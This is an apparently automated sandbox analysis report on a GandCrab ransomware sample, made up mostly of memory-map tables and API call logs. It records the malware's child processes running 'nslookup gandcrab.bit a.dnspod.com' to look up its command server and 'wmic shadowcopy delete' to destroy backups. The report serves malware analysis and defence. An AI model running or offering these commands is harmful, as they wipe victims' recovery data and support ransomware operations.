ntdll.dll 0x7ff9ee770000 0x7ff9ee931fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x00007ff9ee932000 0x7ff9ee932000 0x7ffffffeffff Private Memory Readable True False False
  • Region Actions
Threads
Thread 0xab4
(Host: 8, Network: 18)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x310000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = LHnIwsj True 1
Fn
DNS Resolve Name host = a.dnspod.com, address_out = 112.90.141.215 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 112.90.141.215, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 45, size_out = 45 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 112.90.141.215, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 30, size_out = 30 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 124 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 112.90.141.215, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 30, size_out = 30 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 100 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Process #18: nslookup.exe
(Host: 8, Network: 18)
+
Information Value
ID #18
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup gandcrab.bit a.dnspod.com
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:05:10, Reason: Child Process
Unmonitor End Time: 00:10:26, Reason: Terminated by Timeout
Monitor Duration 00:05:16
OS Process Information
+
Information Value
PID 0x924
Parent PID 0xa5c (c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Groups
  • LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account and member of Administrators group (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0001a1d9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x AF4
0x 90C
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
nslookup.exe 0x00310000 0x00326fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
pagefile_0x0000000000420000 0x00420000 0x0441ffff Pagefile Backed Memory - True False False
  • Region Actions
private_0x0000000004420000 0x04420000 0x0443ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000004420000 0x04420000 0x0442ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004430000 0x04430000 0x04433fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004440000 0x04440000 0x04441fff Private Memory Readable, Writable True False False
  • Region Actions
nslookup.exe.mui 0x04440000 0x04444fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x0000000004450000 0x04450000 0x04463fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000004470000 0x04470000 0x044affff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000044b0000 0x044b0000 0x044effff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000044f0000 0x044f0000 0x044f3fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000004500000 0x04500000 0x04500fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000004510000 0x04510000 0x04511fff Private Memory Readable, Writable True False False
  • Region Actions
locale.nls 0x04520000 0x045ddfff Memory Mapped File Readable False False False
  • Region Actions
private_0x00000000045e0000 0x045e0000 0x045e0fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000045f0000 0x045f0000 0x045fffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004600000 0x04600000 0x0463ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004640000 0x04640000 0x0467ffff Private Memory Readable, Writable True False False
  • Region Actions
imm32.dll 0x04680000 0x046a9fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000004680000 0x04680000 0x04680fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004760000 0x04760000 0x0485ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004980000 0x04980000 0x0498ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000004990000 0x04990000 0x04b17fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000004b20000 0x04b20000 0x04ca0fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000004cb0000 0x04cb0000 0x060affff Pagefile Backed Memory Readable True False False
  • Region Actions
nlaapi.dll 0x73cb0000 0x73cc2fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64.dll 0x73cd0000 0x73d1efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64cpu.dll 0x73d20000 0x73d27fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64win.dll 0x73d30000 0x73da2fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
winrnr.dll 0x73db0000 0x73dbafff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pnrpnsp.dll 0x73dc0000 0x73dd5fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
dnsapi.dll 0x73e50000 0x73ed3fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcrypt.dll 0x73f10000 0x73f2afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
napinsp.dll 0x73ff0000 0x74001fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rasadhlp.dll 0x74010000 0x74017fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
fwpuclnt.dll 0x74020000 0x74065fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
mswsock.dll 0x74070000 0x740bdfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
winnsi.dll 0x74170000 0x74177fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
iphlpapi.dll 0x74180000 0x741affff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcryptprimitives.dll 0x74500000 0x74558fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptbase.dll 0x74560000 0x74569fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sspicli.dll 0x74570000 0x7458dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll 0x745b0000 0x74725fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sechost.dll 0x74730000 0x74772fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x74780000 0x7486ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msctf.dll 0x748c0000 0x749dffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrt4.dll 0x74ba0000 0x74c4bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
nsi.dll 0x74f40000 0x74f46fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ws2_32.dll 0x75500000 0x7555bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
gdi32.dll 0x75660000 0x757acfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
user32.dll 0x77050000 0x7718ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imm32.dll 0x771f0000 0x7721afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x773a0000 0x7745dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x77460000 0x775d8fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pagefile_0x000000007f6a0000 0x7f6a0000 0x7f79ffff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x000000007f7a0000 0x7f7a0000 0x7f7c2fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007f7c6000 0x7f7c6000 0x7f7c8fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f7c9000 0x7f7c9000 0x7f7c9fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f7cb000 0x7f7cb000 0x7f7cdfff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f7ce000 0x7f7ce000 0x7f7cefff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
  • Region Actions
private_0x000000007fff0000 0x7fff0000 0x7df9ee76ffff Private Memory Readable True False False
  • Region Actions
pagefile_0x00007df9ee770000 0x7df9ee770000 0x7ff9ee76ffff Pagefile Backed Memory - True False False
  • Region Actions
ntdll.dll 0x7ff9ee770000 0x7ff9ee931fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x00007ff9ee932000 0x7ff9ee932000 0x7ffffffeffff Private Memory Readable True False False
  • Region Actions
Threads
Thread 0xaf4
(Host: 8, Network: 18)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x310000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = LHnIwsj True 1
Fn
DNS Resolve Name host = a.dnspod.com, address_out = 112.90.141.215 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 112.90.141.215, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 45, size_out = 45 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 112.90.141.215, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 30, size_out = 30 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 124 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 112.90.141.215, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 30, size_out = 30 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 100 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Process #20: wmic.exe
(Host: 16, Network: 0)
+
Information Value
ID #20
File Name c:\windows\syswow64\wbem\wmic.exe
Command Line "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:05:16, Reason: Child Process
Unmonitor End Time: 00:10:26, Reason: Terminated by Timeout
Monitor Duration 00:05:10
OS Process Information
+
Information Value
PID 0x190
Parent PID 0xa5c (c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tubcvd.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Groups
  • LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account and member of Administrators group (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0001a1d9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 8F8
0x B18
0x B1C
0x B20
0x AB8
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
wmic.exe 0x00c80000 0x00ce3fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
pagefile_0x0000000000f30000 0x00f30000 0x04f2ffff Pagefile Backed Memory - True False False
  • Region Actions
private_0x0000000004f30000 0x04f30000 0x04f4ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000004f30000 0x04f30000 0x04f3ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004f40000 0x04f40000 0x04f43fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004f50000 0x04f50000 0x04f51fff Private Memory Readable, Writable True False False
  • Region Actions
wmic.exe.mui 0x04f50000 0x04f5ffff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x0000000004f60000 0x04f60000 0x04f73fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000004f80000 0x04f80000 0x04fbffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004fc0000 0x04fc0000 0x04ffffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000005000000 0x05000000 0x05003fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000005010000 0x05010000 0x05010fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000005020000 0x05020000 0x05021fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000005030000 0x05030000 0x0506ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000005070000 0x05070000 0x05070fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000005080000 0x05080000 0x0517ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000005180000 0x05180000 0x051bffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000051c0000 0x051c0000 0x051c0fff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000051d0000 0x051d0000 0x051d0fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00000000051e0000 0x051e0000 0x051effff Private Memory Readable, Writable True False False
  • Region Actions
locale.nls 0x051f0000 0x052adfff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x00000000052b0000 0x052b0000 0x05437fff Pagefile Backed Memory Readable True False False
  • Region Actions
imm32.dll 0x05440000 0x05469fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x0000000005440000 0x05440000 0x05440fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000005450000 0x05450000 0x05453fff Private Memory Readable, Writable True False False
  • Region Actions
msxml3r.dll 0x05460000 0x05460fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x0000000005470000 0x05470000 0x05470fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000005470000 0x05470000 0x05473fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000005480000 0x05480000 0x0548ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000005490000 0x05490000 0x05610fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000005620000 0x05620000 0x06a1ffff Pagefile Backed Memory Readable True False False
  • Region Actions
sortdefault.nls 0x06a20000 0x06d56fff Memory Mapped File Readable False False False
  • Region Actions
ole32.dll 0x06d60000 0x06e48fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000006d60000 0x06d60000 0x06e0ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000006d60000 0x06d60000 0x06dcffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000006d60000 0x06d60000 0x06d7ffff Private Memory - True False False
  • Region Actions
private_0x0000000006d80000 0x06d80000 0x06dbffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000006dc0000 0x06dc0000 0x06dcffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000006dd0000 0x06dd0000 0x06ddcfff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
wmiutils.dll.mui 0x06dd0000 0x06dd4fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000006e00000 0x06e00000 0x06e0ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000006e10000 0x06e10000 0x0700ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000006e10000 0x06e10000 0x06f6ffff Private Memory Readable, Writable True False False
  • Region Actions
kernelbase.dll.mui 0x06e10000 0x06eeefff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000006ef0000 0x06ef0000 0x06f2ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000006f60000 0x06f60000 0x06f6ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000006f70000 0x06f70000 0x06faffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000006fb0000 0x06fb0000 0x06feffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000007000000 0x07000000 0x0700ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000007010000 0x07010000 0x0719ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000007010000 0x07010000 0x070c7fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00000000070d0000 0x070d0000 0x0710ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000007110000 0x07110000 0x0714ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000007190000 0x07190000 0x0719ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000071a0000 0x071a0000 0x0759ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000075a0000 0x075a0000 0x0772ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000075a0000 0x075a0000 0x0769ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000007720000 0x07720000 0x0772ffff Private Memory Readable, Writable True False False
  • Region Actions
urlmon.dll 0x72510000 0x7266ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
iertutil.dll 0x72670000 0x72930fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
fastprox.dll 0x72be0000 0x72c9bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msxml3.dll 0x72ca0000 0x72e2ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wbemcomn.dll 0x72e30000 0x72e95fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64.dll 0x73cd0000 0x73d1efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64cpu.dll 0x73d20000 0x73d27fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64win.dll 0x73d30000 0x73da2fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wmiutils.dll 0x73db0000 0x73dcdfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wbemsvc.dll 0x73df0000 0x73e00fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
framedynos.dll 0x73e10000 0x73e4efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rsaenh.dll 0x73ee0000 0x73f0efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcrypt.dll 0x73f10000 0x73f2afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptsp.dll 0x73f30000 0x73f42fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
dwmapi.dll 0x73f50000 0x73f6cfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
uxtheme.dll 0x73f70000 0x73fe4fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wbemprox.dll 0x74000000 0x7400cfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
winnsi.dll 0x74170000 0x74177fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
iphlpapi.dll 0x74180000 0x741affff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wininet.dll 0x742c0000 0x744e3fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcryptprimitives.dll 0x74500000 0x74558fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptbase.dll 0x74560000 0x74569fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sspicli.dll 0x74570000 0x7458dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll 0x745b0000 0x74725fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sechost.dll 0x74730000 0x74772fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x74780000 0x7486ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msctf.dll 0x748c0000 0x749dffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
combase.dll 0x749e0000 0x74b99fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrt4.dll 0x74ba0000 0x74c4bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
advapi32.dll 0x74c90000 0x74d0afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
nsi.dll 0x74f40000 0x74f46fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shlwapi.dll 0x75100000 0x75143fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
clbcatq.dll 0x75150000 0x751d1fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shcore.dll 0x75260000 0x752ecfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ws2_32.dll 0x75500000 0x7555bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ole32.dll 0x75560000 0x75649fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel.appcore.dll 0x75650000 0x7565bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
gdi32.dll 0x75660000 0x757acfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
user32.dll 0x77050000 0x7718ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imm32.dll 0x771f0000 0x7721afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
oleaut32.dll 0x77240000 0x772d1fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x773a0000 0x7745dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x77460000 0x775d8fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x000000007ef0a000 0x7ef0a000 0x7ef0cfff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ef0d000 0x7ef0d000 0x7ef0ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x000000007ef10000 0x7ef10000 0x7f00ffff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x000000007f010000 0x7f010000 0x7f032fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007f035000 0x7f035000 0x7f035fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f036000 0x7f036000 0x7f036fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f037000 0x7f037000 0x7f039fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f03a000 0x7f03a000 0x7f03cfff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007f03d000 0x7f03d000 0x7f03ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
  • Region Actions
private_0x000000007fff0000 0x7fff0000 0x7df9ee76ffff Private Memory Readable True False False
  • Region Actions
pagefile_0x00007df9ee770000 0x7df9ee770000 0x7ff9ee76ffff Pagefile Backed Memory - True False False
  • Region Actions
ntdll.dll 0x7ff9ee770000 0x7ff9ee931fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x00007ff9ee932000 0x7ff9ee932000 0x7ffffffeffff Private Memory Readable True False False
  • Region Actions
Threads
Thread 0x8f8
(Host: 16, Network: 0)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\wbem\wmic.exe, base_address = 0xc80000 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Computer Name result_out = LHNIWSJ True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging, data = 48 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory, data = 37 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Log File Max Size, data = 54 True 1
Fn
COM Create interface = 2933BF95-7B36-11D2-B20E-00C04F983E60, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Local Time, time = 2018-01-26 17:56:56 (Local Time) True 1
Fn
COM Create interface = EB87E1BC-3233-11D2-AEC9-00C04FB68820, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

